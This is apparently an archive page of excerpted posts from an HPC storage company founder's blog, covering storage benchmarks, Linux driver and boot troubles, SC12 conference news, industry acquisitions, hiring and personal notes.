Thursday morning, the weather prediction was for 1-3 inches of snow in Secaucus, NJ. I’d been in a data center working the past week on bringing a system to final state. Its done modulo some cosmetic and minor functional issues that should not impede usage. So we accomplished this mission, though I am something of a perfectionist, so we’ll be going back out in a week or so to work on the cosmetic bits.
Posts
Enable changes or enforce design
We have this dilemma. Customers who see our siCluster systems often like everything they see, but want “minor” changes. And we evaluate the changes they want for impact, describe it, and suggest a go/no-go based upon many aspects. Including supportability, stability, etc. We like providing this flexibility. Which gives rise to the dilemma. For us to provide supportable systems that work in a predictable manner, we have to cordon off changes.
Posts
Baseline test for technical staff
As usual, xkcd knocks it out of the park.
[ ](http://xkcd.com/1168/)
I talked about qualifications for our SE position. The ability to talk customers through complex vi-based configuration sessions for system files, while driving 70 mph on the freeway, is a hard requirement. Not quite a munition defusing effort, but close enough. Unfortunately in something like the game of telephone, what I originally wrote was … transmogrified … into something very different.
Posts
A week into the ATI experiment
So I was sick of the crashes in the NVidia driver. Nouveau wasn’t that good. Maybe someday it will be, but its really not that useful to me. So I opted for an ATI W5000 card. Initial install was rocky. The card used VESA drivers, and that was fine for initial boot. Accelerated drivers … didn’t. They were slower than the VESA drivers. Window movements were jerky. It felt … wrong … somehow.
Posts
You asked for it ... Riemann Zeta Function in javascript or node.js
Ok, this was fun. Its been a while since I dusted off good old rzf … ok, its been 12-ish days … but I really have been wanting to try recoding it in javascript. As you might (or might not) remember, I asked questions (a very long time ago) about quality of generated code from a few different C compilers (and eventually the same code in Fortran). I rewote inner loops to hand optimize the compilation, and then recoded as SSE2.
Posts
resonances
This past December, 1 year to the day, and in fact, the very hour my wife was waking up from her surgery, we were at a Trans Siberian Orchestra concert. I like TSO quite a bit, and this had serious significance for us. Like the XKCD biopsiversary, this was our own little F-U to cancer. Not directly related to this, they played a rearranged version of a song on their newer CD.
Posts
... and the positions are now, finally open ...
See the Systems Engineering position here, and the System Build Technician position here. I’ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background … Doug made me take out the “able to leap tall buildings in a single bound” line, as well as the “must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.
Posts
Massive. Unapologetic. Firepower. 24GB/s from siFlash
Oh yes we did. Oh yes. We did. This is the fastest storage box we are aware of, in market. This is so far outside of ram, and outside of OS and RAID level cache …
[root@siFlash ~]# fio srt.fio ... Run status group 0 (all jobs): READ: io=786432MB, aggrb=23971MB/s, minb=23971MB/s, maxb=23971MB/s, mint=32808msec, maxt=32808msec This is 1TB read in 40 seconds or so. 1PB read in 40k seconds (1/2 a day).
Posts
Doing something I've not done in a long time ...
… buying a non-NVidia GPU product. Specifically the ATI FirePro W5000 for my desktop. I need to see if this is any more stable than the NVidia GTX series products. Feedback from customers running various flavors of Fermi, Kepler, Tesla, … suggest that the problem that was reported to me, that I’ve run into, is fairly wide spread. It looks like a particular version of the driver (295.33) may not trip this problem.
Posts
NVidia crashing x server madness
I’ve been having a problem with a newly installed Mint 14 machine. A customer has been having this problem with a Scientific Linux 6.x machine. Some time after lighting up the machine, and usually after using an OpenGL application, the NVidia driver effectively hard locks, dumping error messages like this into the system logs.
[ 5444.863396] NVRM: Xid (0000:85:00): 13, 0003 00000000 00000000 00000ff4 0f000000 00000000 [ 5444.867446] NVRM: Xid (0000:85:00): 9, Channel 00000003 Instance 00000000 Intr 00000010 [ 5444.
Posts
Precision in languages
I’ve talked about precision in previous posts quite a while ago. I had seen some interesting posts about Javascript, which suggested that it was not immune to the same issues … if anything it was as problematic as most other languages, and maybe had a little less “guarding” the programmer against potential failure modes. This is not a terrible problem, I just found it amusing. Understand that I actually like Javascript.
Posts
Game over, and thank you for playing
Remember this?
Can we all just finally admit that not only isn’t it secure, but you can drive a semi truck through its security holes? Unfortunately, many of the kvm-over-ip stacks still use it. So you have these embedded web services things to talk to your java client, your horrifically insecure java client, to ship bytes out over the network to give you console. Can we all start demanding an end to these?
Posts
Rethinking taking @americanexpress in the day job
Long backstory which boils down to this: Every time a customer tries to pay with AMEX, we have to deal with a broken/borked verification system. None of our other credit card companies have issues, just AMEX. This time, they called up and questioned we were legitimate. Ok. They really did. I am going to start recording my calls with them, you know, for quality, and entertainment, purposes. After 5 minutes of dealing with the rep who called us, I asked for her manager.
Posts
Tiburon updated with diskless CentOS 6.3 and Ubuntu 12.04 environments
Our cluster/cloud OS environment now has modules for CentOS 6.x and Ubuntu 12.04. The latter is the LTS system. We’ve got some other tools/bits to setup for this, including working to see if we can build an ARM based PXE booting stack. We are working on making a number of cluster/cloud file system setups as absolutely painless as possible. More later.
Posts
Comments on Javascript being the "new" Perl
This has been making the rounds on Hacker News, Slashdot and others. The author’s central thesis is that Javascript has become something akin to the swiss army knife of cool programming, though its missing bits. He then compares this to Perl. He notes:
Hot is subjective, and in a very real sense, just last year, a teenager in his bedroom not only built a very cool tool, and company, but he sold it.
Posts
Sad end to supercomputer in New Mexico
I’ve written about this before, about 6 months ago. Basically, the Encanto supercomputer in New Mexico, is being disassembled. The parts appear to be headed to universities in New Mexico, so its not a complete loss, but they will still have to pay for maintenance and power/cooling. What I had written before
may be summarized as “there are no silver bullets” to economic growth and prosperity. There are no magic stimuli that automatically return profits atop principal for investment purposes.
Posts
Is 2013 the year that 10GbE finally breaks out to mass adoption?
For years, we’ve been hearing how this year (for all values of this year) is the year 10GbE takes off. I’ve commented on this a number of times, from the context of 10GbE breaking out in clusters, 10GbE killing off infiniband, etc. Looking back, these comments extend 6+ years into the past. The point I have always argued as being the most important, has been cost per port. Well, the technical press noted this today.
Posts
More M&A ... Nexsan snarfed by ... Imation?
Ok, I didn’t quite see this one coming. Really. Honestly, I’ve not paid much attention to Imation in a fairly long time. I do remember tape drives and systems attached to parallel ports from them. I might even have one in my basement somewhere. Nexsan is an array vendor. For those not in the know, the array business is in a slow motion collapse, dumb arrays and associated storage targets aren’t a growth area.
Posts
I have joined the dark side
There is now a Mac Mini on my desk. It is named neutrino. It is light. This isn’t getting rid of my Linux machine(s) by any stretch. And now having used neutrino for a day and change now, I note a few things. This list might make some howl in derision, but these are my observations.
The default fonts and font setup on Mountain Lion is execrable. I mean, really really horrible.
Posts
This has been another banner year for the day job
For the last 4 years, we’ve had significant year over year growth. We set records every year. 2 years ago was a barn stormer of a year. Last year reset the definition of barn storming for us. And this year. Yes, this year. I’ve hinted that we were following a hard/fast growth path. Some folks who read this know the trajectory we are on. 38% growth over last year. Which was 60% growth over the year before.
Posts
OT: Helping a good cause
A few months ago,we had a new addition to our family. This is Captain, and he is what is called a rescue dog. The organization that rescued him doesn’t have that as their primary mission, they build shelters and provide food for dogs whom are chained up outside. Our Captain was one such. He was badly abused, and 4 months later, has major trust issues, and bad nightmares. He has recovered from the physical abuse.
Posts
SC12 video
If you haven’t figured it out, I’ve been busy. This is the very good sort of busy. Rich at InsideHPC.com (you read this, right? Regularly? Right? You should if you don’t) did a whole set of interviews at SC12. There’s some very cool stuff in them. Here’s ours. I’ll tell you the funny stuff at the end.
So this is like 8:30am. I’ve not had my coffee, so my brain is stuck in POST mode, and I am subject to race conditions (mouth stumbling ahead of single brain cell that might be awake).
Posts
sparse file WTFs on Linux
Create a big file …
[root@jr5-lab test]# dd if=/dev/zero of=big.file.1 bs=1 count=1 seek=1P 1+0 records in 1+0 records out 1 byte (1 B) copied, 0.000159797 seconds, 6.3 kB/s [root@jr5-lab test]# ls -alF total 4 drwxrwxrwx 2 root root 23 Dec 19 17:33 ./ drwxr-xr-x 6 root root 73 Nov 6 11:07 ../ -rw-r--r-- 1 root root 1125899906842625 Dec 19 17:33 big.file.1 [root@jr5-lab test]# ls -alFh total 4.0K drwxrwxrwx 2 root root 23 Dec 19 17:33 .
Posts
Microsoft OSes will likely be losing OpenMPI support
I’d been holding off on posting anything on this for a while to see if any group steps up to support it. It looks like this is simply not happening. One shouldn’t infer anything about the Microsoft platforms w.r.t. HPC as a result of this one case. However, in light of the absorption of the HPC group into the larger server group, and other reorganizations, its hard to draw a positive conclusion about the longevity of Microsoft’s HPC efforts.
Posts
The downside to social media
… there are SOOO MANY things to update, pay attention to … Yeah, its heaven for those of us blessed with ADHD (squirrel!), but it takes away time from important things. And of course, there is at least a little irony in blogging about this and having it auto-tweeted. The world doesn’t need more social media.
Posts
Wondering aloud
Call this a hypothesis based upon observation. Its harder for smart people to admit they are incorrect about something, than it might be for the population as a whole. My rationale works like this … the smarter you are, the more defensive you are of that ‘status’ if you will, and so you tend to act in a way to reinforce prior decisions, regardless of their actual (quantifiable) correctness. That is, you are more afraid of the consequences of admitting to being wrong, as compared to actually being wrong.
Posts
Its getting near time for the obligatory Led Zeppelin reference ...
Last year, it was a What is and what should never be. I look some liberal artistic license with the title, and altered its meaning. But the song itself is about thinking about a brighter future.
My family was just getting started down the path of a cancer diagnosis and treatment. My wife was diagnosed, and without explaining precisely why, the doctors urged us to move rapidly. I think we understand now, why they did.
Posts
That was the easiest update ... evuh ...
Wordpress before 3.5 to Wordpress 3.5. 1 button click. 1. Count em. 1. Uno. No dos. I am going to take that lesson to heart. One button.
Posts
Updated DeltaV4 quick benchies
Streaming reads and writes. Far beyond memory/cache/… all spinning disk. Remember, this is our “slow” storage.
[root@dv4-1 ~]# df -h /data Filesystem Size Used Avail Use% Mounted on /dev/md2 55T 65G 55T 1% /data Run status group 0 (all jobs): WRITE: io=65505MB, aggrb=1467.7MB/s, minb=1467.7MB/s, maxb=1467.7MB/s, mint=44633msec, maxt=44633msec Run status group 0 (all jobs): READ: io=65412MB, aggrb=1814.5MB/s, minb=1814.5MB/s, maxb=1814.5MB/s, mint=36050msec, maxt=36050msec
Posts
I am guessing they don't get it ...
I wrote this some time ago.
This is even more true this year than last. So when people call me up and try to tell me of the glamour of working for another company, they need to take this into consideration. But they don’t. So they call all the extensions on our phone. And leave messages for everyone. Um … yeah. We are growing, much faster than I had anticipated. We are actually on a real live hockey stick revenue curve.
Posts
Our cloudy future
So I just dealt with a hack on the @sijoe twitter account. And I went through a process of re-locking everything down. What occurs to me, is that this is our cloudy future. Where resources could be effectively stolen from us, say CPU cycles and storage, not merely hacking useless social media sites, by fairly determined hacking groups. Think about this for a moment. You have a large allocation on EC2 for some reason, and your account gets hacked.
Posts
Well, that was fun
Somehow/somewhere, the @sijoe twitter account was compromised, and a bad tweet generated. I deleted the tweet. Then revoked all access to twitter from all accounts. Then made sure I’ve got two factor authentication up everywhere possible. Then changed all passwords on all accounts. Are we having fun yet? Somehow, I have a sense that this is our computational future. I’ll elaborate on this shortly. Let me finish hooking up the newly re-secured bits to each other (well, a more limited version of this …) And no, I wasn’t able to identify the culprit vector.
Posts
What we've been working on for the past several months
… I still can’t talk about it publicly, until everything is live, and I get the OK. But it is awesome, and its a pleasure to work with the large extended team we are working with. And yes, this is killing me. I love to talk about cool stuff.
Posts
I can't believe its been one year since I wrote this
This post.
That was written in the late evening of the 29th of November 2011. Today is the 1 year anniversary of that visit. Chris Samuel (@chris_bloke) and his wife went through a similar event somewhat before we did. And he pointed out this XKCD to everyone on his twitter feed. We got our surgical slot quickly, I believe we were given priority. Not sure why, but the post-operative analysis indicated that the cancer had broken out of the duct, and was growing rapidly.
Posts
Initial results for 60 bay unit running a software RAID
Our new JackRabbit tightly coupled storage and computing unit is on the test track, and about to go out the door to a customer. Need a few minutes with it, after quick tuning to generate some performance data. This is a single 4U server unit with 1/4 PB within it. Streaming 1TB from disk. This is using our tuned software RAID6. Our hardware accelerated RAID results will be generated later in the next batch of tests with new units we are building.
Posts
Learning limits of Linux distribution infrastructure
Its only when you stress a distribution infrastructure that you truly see its limits. And as often as not, the fail winds up being widespread. Our new 60 bay JackRabbit unit with CentOS 6.3 on it … and this is not a bash at CentOS, they do a great job rebuilding the Red Hat distribution without the copyrighted bits … has a number of software RAID elements on it. 9 in the current test.
Posts
ICL (IPMI Console Logger) update
Ok, this took me forever to get this done. But, I’ve had inquiries from a large number of people/companies, so here it goes: Have a looksy at the repo here This is the older code, with a single host at a time (plumbing is for many many hosts at once), with no triggers. That code is about a week away (I don’t like committing broken code). For what its worth, this is going to be used at scale in one of our projects.
Posts
Controversy in the kernel
Referring to this article, it appears that there is some issue with an important subsystem in the Linux kernel. The SCSI target code, specifically the new implementation pulled in by James Bottomley is the LIO framework based upon work of Nicolas Bellinger and Rising Tide Systems. This was chosen over the SCST implementation, which continues to soldier on. We did have a dog in that race, and would have preferred to have seen SCST included due to our familiarity with it.
Posts
Post SC12: some thoughts and updates
That was our best SCxy show. Ever. Inclusive of all 17-ish years I’ve attended (getting to be something of a geezer I guess). The 60 bay JackRabbit system got lots of attention. That we are putting the Calxeda backplane and energy cards in, come January time frame, brought many people in to talk about this. Big data was a one of the huge topics. I’ve been saying Big Data is not just Hadoop.
Posts
SC12 panel on big data
Listen to their definition between 3 and 6 minutes in.
The storage performance and IO performance, and networking is extraordinarily critical to these problems. Which has been the set of problems we’ve been focusing on for a long time. Also worth noting that Addison Snell nails it on HPC and big data relationships. They are debating definitions and other aspects, but at the end of the day, the idea is that HPC has been a set of techniques, designs, and platforms upon which we’ve been banging on big data problems for decades.
Posts
And its over till SC13 ...
Upfront: This was the best SC conference we have ever participated in. From an interest level, traffic level, and various meetings with partners, customers, and others. And to the folks who might be reading this whom we missed, or had to cut short conversations due to timing, please feel free to call/email us. We are reachable via the usual methods. Everyone marveled at the 60 bay chassis. Oddly enough, I never had time to set up the benchmarks on it.
Posts
SC12 day 1
Ok, beobash rocked. As usual, Lara at Xandmarketing, Doug Eadline did an absolutely awesome job. For those I bumped into, hello again. I apologize if I didn’t spend more time with you … especially my readers … I was operating on fumes at that point. Please don’t hesitate to introduce yourself during the day at the booth (4154) at SC12. Got up early, got into the booth, did an interview video with Rich B at InsideHPC.
Posts
On the test track: New JackRabbit, open the throttle wide ...
I know, I know, I really should wait until the drive build is done. I know I should do that. [root@Mj?lnir ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/md0 89G 6.8G 77G 9% / tmpfs 127G 0 127G 0% /dev/shm /dev/sdc 48T 393G 47T 1% /data/3 /dev/sdb 48T 395G 47T 1% /data/2 /dev/sdd 33T 367G 33T 2% /data/4 /dev/sda 48T 374G 47T 1% /data/1 I called it Mj?
Posts
The joys of running one's own mail server
Minor issue. We changed IP addresses at work recently. A larger block of public facing IPs for more functionality. And in doing so, we updated almost everything correctly. Yes, almost everything. Almost. Everything. The one, minor … trivial … thing we left unchanged … broke our support site sending reply emails correctly. They were rejected about 50% of the time, as they came in on the wrong port/ip. So for the last week we’ve been sending extra emails.
Posts
Heavily armed rabbits
Saw this blog post with a cartoon in it.
[ ](http://www.rscottillustration.com/image/lucky-rabbits-foot)
Those are armed rabbits. Sorta like JackRabbits. And that might not be the only definition of “ARMed” out there. Heavily ARMed JackRabbits. Not that I’m hinting at anything. Maybe people should just visit our booth 4154 at #SC12 …
Posts
Where I come from ...
… this is called being a mensch. Well played Michael Ferns, well played (in an respectful way). And welcome to Michigan and the Wolverines.
Posts
Fads, waves of the future, etc.
Fads are standing waves of marketing/sales/technology that have limited lifetime, yet generate buzz. Fads die out, and they consume resources during their existence. Fads rarely ever do more than help cull the herd … assisting evolutionary processes that weed crappy technology dressed up nicely and packaged for sale. Best example of these I can come up with were the cycle stealing codes, that turned your machine into a “supercomputer” by aggregating cycles across many hundreds and thousands of machines.
Posts
Not good
Rich B at InsideHPC.com posts about the national labs exit from floorspace at SC12. The claim is due to budget cuts, but the GSA scandal and its fallout likely have a higher precedence to the upper echelon of decision makers. Which if you think about it, only a minute amount, you realize is the very definition of the cliche to cut ones nose off to spite their face. To any decision makers out there, this is the wrong thing to do.
Posts
Ultradense and fast JackRabbit coming next week
I don’t know that we’ll be able to get enough 4TB drives for all the units. We’ll talk about it some more at SC12, and should have a few units with 4TB, 3TB, and possibly 2TB drives in them. For those whom aren’t aware, our JackRabbit unit is already the fastest spinning disk single server that we are aware of in market. Its dense, up to 144TB in a 5U container.
Posts
On the money
Charles Stross (@cstross) is one of my favorite writers. We have wildly different views on things, but I like his writing, and his very clear thinking and story telling. Which is why I have to say that this blog post puts a nice context box around some of the things we hear about “saving the planet.” Something akin to this has been running around my head for a while, but not nearly as elegantly put.
Posts
Oh joy ... a crash on our Amazon EC2 hosted web server
[update 2] Yuppers, Amazon US East N. Virginia is experiencing issues. C.f. here.
Doug thought I did this with our IP update (larger block of static). So did I for a moment until I logged in. Partial failure on my part for not having the backup live/ready. Wlll remedy over the next day or two.
[update] I think we can call this one a #fail.
Imagine if some small business with no technical acumen, sold on the “push this button to run your website” saw that error message.
Posts
AMD has an SGI moment
$131M quarterly loss. They have a looming 15% (think one out of every seven) RIF. I remember those from SGI days. I remember being on an ACS show floor, giving demos, and learning that some of my colleagues on the show floor with me, were part of the RIF. SGI itself isn’t doing well, but thats a story for another time. Still have lots of friends at AMD. Folks I’ve worked with and respect highly.
Posts
Initial plans for SC12
Assuming all the hardware is ready … not sure, but hopefully it will be. We’ll have a siCluster at the booth. Powered by partner’s 10/40GbE fabric, and running a few different cluster file systems. FhGFS is a no brainer, it will be on there. Ceph should be on there. GlusterFS should be on there. Thinking about Lustre, may do this via our presentation layer, so we can avoid dealing with the pain of hyperspecialized kernels, and specific hard distro revision requirements.
Posts
Beta version of FhGFS: now with mirror capability!
One of the best parallel file systems just got better. FhGFS now has content mirroring (client and server side!) as well as other nice improvements! We’ve used the preceding release on our siFlash unit. I’ve not shared the results publicly to date, but suffice it to say that the performance was absolutely stellar (it helps that siFlash is the fastest 4U SSD/Flash tightly coupled computing and storage array in market). We are planning out our SC12 booth now.
Posts
Growth
I’ve hinted a little at what’s going on, but I haven’t come fully clean yet. Will do soon. I promise, though likely it will be public after SC12. Suffice it to say that the company is on a track to grow significantly in the near term. No, this is neither a capital raise, nor an acquisition. We have a practical problem. We’ll be setting up an office in NJ/NY area to serve our customer base there, and we will need extremely good technical and support people, along with some of the other folks we plan to put there.
Posts
Update on the scammers spoofing our number
We’ve started following an interesting suggestion made to us. It involves some cost, but its got the nice side effect of providing us (eventually) with the call data records from the phone company. Assume we will be getting the information we need, soon, to deal with this. We have a potent legal cocktail waiting for this information. Of course, the scammers decided to step things up a bit. One claimed to be with the FBI.
Posts
Updated configs for storage
Had neglected to mention this, but all of the day job’s units support 4TB drives. This means you can get 4U goodness up to 96TB, 5U goodness up to 192TB, and very soon (and we’ll start taking early orders for it) 4U with up to (about) 1/4 PB directly coupled to a very fast computer, with incredible amounts of IO and network bandwidth. Full 42U rack with about 2.5PB raw, and about 40GB/s sustained streaming write, and 60GB/s sustained streaming read performance in aggregate.
Posts
Scalable Informatics at SC12 in Salt Lake City
Bigger booth this year, number 4154 (10x20) … last year was WAY too cramped. Planning stuff … keeping it simple if possible. Maybe a minirack with a siCluster … thinking about this hard. Definitely a dense storage system, an insanely fast storage system. Probably some streaming stuff, and pounding on IO similar to what we did at HPC on Wall Street. Will probably have a few partners with us (and their bits) in the booth.
Posts
memtest delenda est
Ok … maybe not so much destroyed. More like “ignored as a reasonable test of anything but DIMM visibility, and very basic functionality”. Memtest has several variants running around, all of which purport to hammer on, and detect, bad RAM. The only problem is, it doesn’t really work well, apart from trivial cases. That is, if you have an iffy ram, you’d need days/weeks/months of testing with this code rather than putting it in a box and running a hard pounding code on it.
Posts
Response to the 11+ GB/s unit was ... incredible ...
We showed two large speedometers, one with Bandwidth, one with IOPs. These measured their data right off the hardware (via the device driver and block subsystem mechanisms). First, we ran a fio test with 96 threads reading 1.1TB of data in total. This took about 100 seconds or so. Second, we ran a fio test with 384 threads randomly reading 8k chunks of data out of that 1.1TB. Left them in a loop, with a big speedometer pair on the screen.
Posts
Tiburon again saves the day
Useful code (e.g. code == program) has a tendency to save you lots of pain when other solutions fail you. Powerful code lets you do things that lesser codes mess up. Intelligently designed and written codes allow you to debug them easily and quickly, as well as their operational impacts. None of these qualities describes grub. Grub is … well … grub. If you have to deal with it on a daily basis, you understand what I mean by this.
Posts
turning siFlash past 10 (GB/s that is) ...
Yeah, that title is a Spinal Tap homage. We are bringing a new siFlash unit to the HPC on Wall Street conference. This uses our new chassis, an updated kernel, and lots of tuning. Still have much more work to do … but its probably good enough to ship now. I ran a few quick speed drills on it. 4.2 GB/s streaming write , and 10.7 GB/s streaming read with 96 simultaneous processes.
Posts
IPMI Console Logger is born
Here’s the problem I am trying to solve, call it a many year itch I’ve been wanting to scratch. We build very high performance storage clusters, extreme performance flash and ssd arrays, and a number of other things. At customer sites, while in use, a unit could crash. When it does, we really need a full console log to see the full crash log. Unfortunately, the “write to the screen” method gets very … very old when you are trying to transcribe something … thats happened to scroll off the screen.
Posts
Not even wrong
There’s a story about Wolfgang Pauli about how another physicist gave him a dubious paper to look over to get his opinion. Pauli, ever the critic, remarked about the paper something akin to this:
This is a way of saying that there are failures so deep, so fundamental, that one cannot get past them to deal with the basic issues of the underlying theory. If the fundamentals are off, there is no possible way that the theory could remain intact.
Posts
slight change to site: comments
We’ve been getting spammed. So I am now requiring comment submitters to have a previously allowed comment to be able to comment without issue. I hate doing this, but I don’t want this to become yet another waste of bits, lousy with comment spam. If this doesn’t work, I’ll change it to require user login to comment. [update] Since making the change, no spam has made it through, though they have tried.
Posts
An avulsion fracture of 4th finger on left hand
This is what I get for sparring with 13 year old black belts … sigh … starting to feel old :( Splint, ibuprofen, and no sparring for a while (could do 1 hand and 2 feet, but that requires a far larger ego than I have, not to mention some brass ones … which I can’t say I have relative to my sparring abilities) . Probably can’t handle my bo either.
Posts
OT: A plea for help
We have a problem. Some company has spoofed our telephone number for their caller ID, and have been calling up people harassing and threatening them. We get calls from many very pissed off people, and I have to explain the situation to them. Usually its one per week. We took 5-6 calls about this, just today. Ok. Gotta stop this. The folks doing this are dragging our name through the mud every time they do this, as they are misrepresenting themselves as us by using our phone number.
Posts
[updated at bottom] Apparently there are people this profoundly ... well ... see for your self
At first I was ready to discount this as “entrapment” or something like gonzo journalism. But … its … not … A plain and simple question, nothing complex. Should we ban corporate profits? What is astounding, or horrifying is the location where it is being asked, and the seemingly normal people happily espousing what is basically a ridiculous concept.
Here is my take on this. First off, Peter Schiff is something of a notorious guy.
Posts
Going over some old records
… and I ran across a situation where we helped out a customer, and we were screwed over after they decided not to pay a part of their bill. They don’t deny they owed it. They just didn’t want to pay it. And the hard part, being that they were out of country, in a different jurisdiction, there is little we could do. This is part of bleeding when you build a business.
Posts
Excellent read on statistics and how people misuse it
Link is here. I cannot tell you how many times I’ve had a conversation with a researcher, when we talk about statistics, and they quote me some high correlation coefficient as being evidence of causality. Any physical scientist, chemist, engineer, … knows that you have to treat correlation coefficients very carefully, and you cannot substitute these for a real causal relationship with a backing theory that provides a testable model. That is, the causal relationship is fundamentally an aspect of the theory, with the latter able to guide you on making predictions.
Posts
I had a sense this would work out well
As I noted in an earlier post Joyent had discontinued an aging service, but one which many people had bought into, with the promise of “forever” service. I pointed out that in this sense, forever couldn’t mean, in a literal sense, forever … But I had suggested as well that they would likely try to find a way to make a transition better for people. And they did.
This is perfect illustration of how to handle these transitions.
Posts
Brittle, poorly designed pipelines
One of the more powerful aspects of cluster and cloud computing is the effective requirement for building in fault tolerance of some sort, to a computational pipeline. You have to assume, in a wide computation scenario, that some aspect of your system may become unavailable. Which means you need a sane way to save state at critical points in your workflow. You need sane distribution and management of the workflow. You need to be able to route around errors.
Posts
Two "new" projects
Hyperspace and 26. One does something wholly unholy, and the other takes our significant advantage in a particular area and makes it … well … even more of an advantage. Hyperspace may be with us at HPC on Wall Street. Working on it with our partner in … er … alternative dimensions. Yeah. Thats the ticket! Assuming everything works out, you will hear about 26 before SC12, and probably see a few there.
Posts
SmartOS now booting from Tiburon
Ok … took a little bit of hacking on Tiburon to add a capability I had long wanted to add in. And its not completely doing things the SmartOS way … but it works for the moment.
[ ](/images/SmartOS-booted-from-Tiburon.png)
Have some additional testing to do, drivers to test, yadda yadda yadda. But the message should be clear. We can boot SmartOS from Tiburon (Scalable Informatics siCluster Storage and Computing cluster infrastructure).
Posts
A code to measure IOPs/Bandwidth
Many testing codes for storage systems report various values, by shoving IO down the pipe, and measuring amount shoved, and interval between the first IO call and “end” of last IO call. This is all well and good for some cases, but caching and many other effects get in the way of accurate measurement. Systems eventually settle down to an approximate state with small perturbations around this state. The problem is that most tools don’t quite report this.
Posts
I see benchmarketing back in full swing
I’ve read quite a few storage press releases talking about how “product X is capable of performance Y and IOPs Z.” I also notice that they didn’t say “we measured this, this way, and this is what we found.” I wonder why. I look at it this way, if we reported numbers the way lots of these folks report numbers, our JackRabbit JR5 machine would have a bandwidth of 6.2GB/s read and 5GB/s write.
Posts
Rereading posts from 6 years ago ...
NFS sucked then as well. We’ve got a customer whom occasionally pushes their hardware a wee bit too hard. And stuff comes crashing down. Basically it looks like a kernel bug, one I’ve not been able to ID for a number of reasons, and I can’t find a mechanism to reliably tickle it. This is the definition of a Heisenbug. Basically the problem is this. They use NFS, extensively. NFS is great for low level IO rates.
Posts
started playing with SmartOS for the day job
This is a very cool concept, something that meshes perfectly with our Tiburon based siCluster philosophy. That is, compute nodes should boot diskless, there should be very little state on each node, and stuff that you need to do should be made absolutely as simple as possible. SmartOS is a project of Joyent. Joyent, for those not familiar with them, are a cloud company, building a nice public cloud for end users to build on.
Posts
Dear DEA ...
According to this you don’t have enough high performance storage for your analyses.
First off, no, its not expensive. You are just using the wrong vendors. Second off … please … PLEASE … call us. We’d be happy to hook you up with Petabytes for the price you are likely paying for Terabytes. Seriously. Our units are inexpensive enough that you could buy them, replicate the data across them, and then store them.
Posts
one of the curious features of our history
This is about learning, not from mistakes, but from a … well … empirical approach to “partnerships”. When I started up the company 10 years ago, we weren’t on anyones radar. Self funded, running out of my basement. Yeah, real big threat there. I noticed something though. During our time operating, first as an LLC, then as an Inc., we attracted a range of … er … partners and others. Many of whom would come to try to, for lack of a more accurate way to phrase this, pry ideas, plans, and IP/designs out of us.
Posts
grub drive enumeration
So there you are, helping a customer out with a problem. They’ve just added in a replacement OS disk using your process. At the end of the process is a bit of … well … an insurance procedure. Make sure grub is correctly on each drive in the RAID1. The grub.conf file has root (hd0,0) kernel .... root=/dev/md0 ... initrd ... Makes sense, right? Cause hd0 enumerates to the first bios drive used for booting in the boot list.
Posts
What does "forever" really mean for a company? And its implications for clouds ... and business models ...
Note: in advance, this is not a slam on the company I will mention. I actually agree with their migration concept, even if I disagree with the details. In the early days of their life, Joyent made a lifetime offer for goods and services. These were pretty reasonable offerings, and the hook of
How long is it good for? As long as we exist. As in … forever. But what does “forever” actually mean?
Posts
More M&A: IBM snarfs up Texas Memory Systems
We knew that TMS was looking for a buyer. And IBM is a very intelligently run company, they see how the technologies are changing. IBM has grabbed TMS. This alters a bunch of playing fields. There are a shrinking pool of players out there available. Virident, STEC, and a few others. OCZ is occasionally rumored to be talking to Seagate and others. With TMS, IBM can now offer TMS metadata servers for GPFS, integrated.
Posts
More M&A: TCS grabs CRL
TCS is arguably one of the more successful services groups out there. Cloud computing naturally fits into this, as cloud is AAS (As A Service). CRL has a localized bit of expertise in Pune, as well as customers pretty widely spread out. We’ve worked with them in the past, they have some of our gear. Dr. Vipin Chaudhary, CEO of CRL is a good friend and business partner going back a ways.
Posts
Day job will be at HPC on Wall Street conference in NYC 19-Sept
Still deciding what to bring … at least one thing new (we have a number). Will have at least one partner in the booth, possibly more. Will be right by the coffee !!!! I can hook an IV straight from there … Very excited! More info soon.
Posts
As a service: the rapidly changing face of HPC
Our market is often inundated with buzzwords. And fads sweep through organizations looking for silver bullets to their very hard problems. Some of these problems are self-inflicted … some are as a result of growth, or needed infrastructure change. One of the biggest problems with HPC (and to a degree, storage) has been the high up-front costs to build what you need. You have to lay down capital to buy something, which may or may not have an ROI adequate to pay for it.
Posts
OT: Welcome to the newest member of our family
Captain is a rescue dog from the CHAINED Inc. organization. He is the dog on the right at 1:21. His sister is the dog on the left of that frame.
[ ](/images/captain.jpg)
Captain is a 9 month old or so yellow lab. He was badly abused. He has major trust issues, and I don’t blame him for this. It will take time to learn to trust. He’s been with us 5 days now, and loves my wife and daughter.
Posts
Whats old is new again
Inspired by this article. Back in the dim and distant past, when I started graduate school … no before that … I had something of an … naive … world and economic view. This view had me believing that newly minted physics Ph.D. types would be able to find a nice tenure track relatively easily after a short postdoc. From there to professional career bliss. Do research, write grants, publish, teach.
Posts
Cool hack attempt ...
This one was actually much harder to discern that it was a hack attempt until I looked at the payload in an editor. Never EVER under any circumstances read HTML mail from a source you don’t trust … and I am getting ready to say, from anyone. Here is a portion of the payload: `
Posts
So much #fail in the RHEL init process
Its borked so incredibly badly, that in order to support what we need, we have to hack around all its brokenness. Dracut is a step up, but pretty much everything else (and this may be a dracut issue) is borked. We want one initramfs to support software RAID1 boot, network boot, iscsi boot. But you have to pull in so many modules to get this to work … we have gigantic initramfs that take forever to assemble.
Posts
We built that: 10 years in business
[warning: longer post] I mentioned this on twitter (@sijoe). The day job has been in business for 10 years. We’ve not taken outside investment to date, and we’ve not sold the company yet. We’ve been profitable and growing continuously during our lifetime. The preceding 3 years have seen growth, accelerating hard. The company was built starting with a conviction that practitioners and users of HPC systems needed better designs, better systems than were being pushed out by traditional vendors in the early 2000’s.
Posts
... and Oracle snarfs up Xsigo ...
Xsigo makes virtual network connectivity systems. Basically letting you build a virtual network, in a software stack, so you can avoid spending so much money on a fixed (and inflexible) network stack. Its a neat concept, but its utility is focused elsewhere than HPC. Even though they talk storage, I’d argue its a fairly expensive way to build a network for storage as well … though if you are going to be changing your network all the time, it actually might be a win.
Posts
... and he's back!
with a good article on a new license formulated for genomic code being distributed by a university research center. Glad to see the blog back up! Or rebooted … and +10 on your article. It (that license) is the wrong direction IMO. Goes against what publicly funded scientific code should be distributed as (IMO).
Posts
More M&A?
